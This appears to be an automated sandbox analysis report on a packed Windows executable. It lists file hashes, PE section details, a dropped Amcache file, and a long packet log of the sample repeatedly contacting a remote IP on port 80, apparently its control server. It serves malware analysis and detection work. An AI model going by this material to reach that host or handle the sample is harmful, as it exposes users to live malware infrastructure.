.f.a.s.t.e.r.8.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.7.W.u.d.V.Z.e.K.w.Z.E.d.s.u.z.z.f.2.s.S.\.Y.-.C.l.e.a.n.e.r...e.x.e.G.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.7.W.u.d.

C:\Windows\appcompat\Programs\Amcache.hve

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468605924989875
Encrypted:	false
SSDEEP:	6144:wzZfpi6ceLPx9skLmb0fpZWSP3aJG8nAgeiJRMMhA2zX4WABluuNZjDH5S:mZHtpZWOKnMM6bFpbj4
MD5:	9F84633895CBFD09F2D2B368EBE7C513
SHA1:	525632559CA0C9514EFE9F649B7D4EEA6C475015
SHA-256:	E0A243E3C78010A8170EDCDBEA714194F9751170FD5CBB3B125546DB11A487C2
SHA-512:	041CA163321B1543A8D58EA8E241F7F7BDB7BC61B08F126DAF4E85281916E17115BAE7EC7C4D624445901DCC843052902720A96F1A8E33AD03A7A218C6BE8CC3
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.&.z.R.................................................................................................................................................................................................................................................................................................................................................N........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.941550856933124
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	7JKssbjRDa.exe
File size:	1'969'664 bytes
MD5:	838f2a05f5d5d176ef23390b574df27e
SHA1:	05f4d73d60678a957d707a50b9e2ba602df251a4
SHA256:	0bc701ef4388791bada9941de033f45c0aea4839ea7c5067ff15d20f452ad1c1
SHA512:	60e4644c083caaf154fc3dc7b5c0748ddf3d038edc26b33e942d32c14ec25ca7d110ee4f0cc24d32f4bf1221e6cc1bc941a250e78301a5a5f7fc06bc59279007
SSDEEP:	49152:ZBKz9LRggeGKunlTIcZNGJTKE/ExCDqmsYUbYHZU:H0ZReFuOcZNGZExCOOUoZ
TLSH:	F09533350EF967C9C88E1D33D226B5D8FB40B8686FDF232BD598495CDC217A689C68D0
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i..............nG@......ZR......ZC......ZU......................Z\......ZB......ZG.....Rich....................PE..L....,.e...

File Icon


Icon Hash:	e7a99a8a8651790c

Static PE Info

General

Entrypoint:	0xc69000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x65B12CA8 [Wed Jan 24 15:28:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F68C0F4AE1Ah
paddsb mm3, qword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00h], ah
add byte ptr [eax], al
pop dword ptr fs:[edi+0Fh]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x41805b	0x6f	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x40d000	0xaea0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x8608f8	0x18	phahcjgr
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x40c000	0x24e00	52e92fefca012de72a48faabfec56b41	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x40d000	0xaea0	0x7000	0acd0686d6d14aa9a26433785c818605	False	0.9678431919642857	data	7.901459871701623	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x418000	0x1000	0x200	b8539b83d0b3f253ed2a56b71af0554b	False	0.154296875	data	1.085758102617974	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x419000	0x29d000	0x200	5a57f8d0af95e44b71838f47f27f9464	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
phahcjgr	0x6b6000	0x1b2000	0x1b1600	8b4f42572c65c01f0a03df1ccd354377	False	0.990221418012691	data	7.948616359297866	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gfxrfigu	0x868000	0x1000	0x400	38711da15cb94b149152bd2ef3e3164d	False	0.71875	data	5.871271530681922	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x869000	0x3000	0x2200	8f2a92de70ab394ef1154b46c0563ed4	False	0.06537224264705882	DOS executable (COM)	0.6551245930016943	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x860958	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkmen	Turkmenistan	0.7971748400852878
RT_ICON	0x861800	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkmen	Turkmenistan	0.7838447653429603
RT_ICON	0x8620a8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkmen	Turkmenistan	0.7200460829493087
RT_ICON	0x862770	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkmen	Turkmenistan	0.740606936416185
RT_ICON	0x862cd8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkmen	Turkmenistan	0.6840248962655602
RT_ICON	0x865280	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkmen	Turkmenistan	0.7345215759849906
RT_ICON	0x866328	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkmen	Turkmenistan	0.7622950819672131
RT_ICON	0x866cb0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkmen	Turkmenistan	0.8111702127659575
RT_STRING	0x413c80	0x330	data			0.8370098039215687
RT_STRING	0x413fb0	0x170	data			0.15
RT_STRING	0x414120	0x620	empty			0
RT_STRING	0x414740	0x762	empty			0
RT_STRING	0x414ea4	0x852	empty			0
RT_STRING	0x4156f8	0x726	empty			0
RT_STRING	0x415e20	0x658	empty			0
RT_STRING	0x416478	0x6c0	empty			0
RT_STRING	0x416b38	0x638	empty			0
RT_STRING	0x417170	0x88a	empty			0
RT_ACCELERATOR	0x4179fc	0x20	empty			0
RT_GROUP_ICON	0x867118	0x76	data	Turkmen	Turkmenistan	0.6610169491525424
RT_VERSION	0x86718e	0x1b4	data			0.5711009174311926
RT_MANIFEST	0x867342	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkmen	Turkmenistan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 16:32:29.692298889 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:29.812011957 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:29.812597990 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:29.813419104 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:29.933270931 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:31.271990061 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:31.272192955 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:31.283751011 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:31.404397011 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.117234945 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.117312908 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.121937990 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.241563082 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.721314907 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.721340895 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.721350908 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.721363068 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.721535921 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.721724987 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.721735001 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.721745014 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.721759081 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.721764088 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.721782923 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.721813917 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.729504108 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.729551077 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.730108976 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.730154037 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.738009930 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.738027096 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.738063097 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.738082886 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.913176060 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.913228989 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.913269997 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.913311005 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.917300940 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.917378902 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.917798042 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.917850971 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.925132990 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.925180912 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.925700903 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.925749063 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.933060884 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.933110952 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.933445930 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.933548927 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.941097975 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.941144943 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.941361904 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.941412926 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.949246883 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.949259043 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.949290037 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.949311018 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.956988096 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.957048893 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.957143068 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.957186937 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.965128899 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.965157986 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.965179920 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.965198040 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.972942114 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.972990036 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.973949909 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.973994970 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.981018066 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.981097937 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.984535933 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.984571934 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.984651089 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.984689951 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.992543936 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.992609024 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:32.992635965 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:32.992671013 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.000386953 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.000448942 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.106180906 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.106270075 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.106666088 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.106714010 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.109616041 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.109673977 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.110297918 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.110351086 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.115902901 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.116059065 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.116089106 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.116137981 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.122004032 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.122055054 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.122198105 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.122246981 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.128355026 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.128405094 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.128937960 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.128979921 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.134761095 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.134814024 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.135648966 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.135694981 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.145282030 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.145354986 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.145616055 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.145659924 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.146704912 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.146748066 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.147106886 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.147145987 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.152681112 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.152740955 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.152817011 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.152864933 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.158643007 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.158732891 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.159876108 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.159939051 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.164589882 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.164661884 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.165031910 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.165092945 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.170829058 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.170893908 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.171128988 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.171170950 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.176734924 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.176799059 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.177787066 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.177834034 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.182971954 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.183031082 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.185910940 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.185961962 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.189038992 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.189090014 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.189552069 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.189693928 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.194892883 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.194957972 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.195089102 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.195126057 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.200967073 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.201037884 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.201560974 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.201605082 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.206904888 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.206969023 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.207331896 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.207380056 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.213722944 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.213777065 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.213895082 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.213938951 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.219299078 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.219326019 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.219347954 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.219362020 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.225317001 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.225375891 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.225742102 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.225785017 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.230993032 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.231085062 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.231327057 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.231370926 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.251843929 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:33.372350931 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.787786007 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:33.788006067 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:35.813429117 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:35.933356047 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:36.305159092 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:36.305305958 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:38.328995943 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:38.449090958 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:38.817686081 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:38.817869902 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:40.844329119 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:40.964904070 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:41.336776018 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:41.336862087 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:43.360033989 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:43.481218100 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:43.846036911 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:43.846128941 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:46.016999960 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:46.136564016 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:46.508332014 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:46.508430004 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:48.594345093 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:48.714706898 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:49.128417969 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:49.128602982 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:51.141871929 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:51.261385918 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:51.629704952 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:51.629911900 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:53.641278982 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:53.760798931 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:54.127459049 CET	80	49793	185.156.73.23	192.168.2.6
Dec 20, 2024 16:32:54.127507925 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:56.141664028 CET	49793	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:56.141762972 CET	49853	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:32:56.264481068 CET	80	49853	185.156.73.23	192.168.2.6
